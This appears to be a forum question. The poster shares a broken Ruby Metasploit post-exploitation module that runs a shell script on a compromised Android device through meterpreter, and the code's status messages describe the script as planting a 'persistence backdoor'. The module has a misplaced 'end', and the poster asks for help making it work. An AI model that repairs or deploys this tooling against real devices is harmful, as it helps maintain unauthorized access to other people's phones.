I'm trying to build a module that will allow me to run a .sh script on an android device through meterpreter. I can run this manually by typing shell in the meterpreter session the problem is I can't automate this with an .rc file because it stops when it opens the shell, however I was thinking I could make a module that could execute the code on the target device that I could run through an .rc file.
I have copied my ruby file into /metasploit-framework/modules/post/android/manage/ and ran updatedb from msf but when I attempt to call the module it says:
[-] No results from search
[-] Failed to load module: post/android/manage/postscript
I think the problem may be in the code, I'm still quite new to programming especially ruby so apologies if the problem is obvious.
Here's the code:
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::Common
def initialize(info={})
super( update_info( info, {
'Name' => "Script Executer",
'Description' => %q{
This module runs any .sh script on android shell through meterpreter.
},
'License' => MSF_LICENSE,
'Author' => [ 'asta' ],
'SessionTypes' => [ 'meterpreter' ],
'Platform' => 'android',
}
))
end
def run
print_status("Running persistence script")
cmd_exec("sh /sdcard/boot.sh")
end
print_status("You now have a persistence backdoor")
end
end
Any help or suggestions would be greatly appreciated.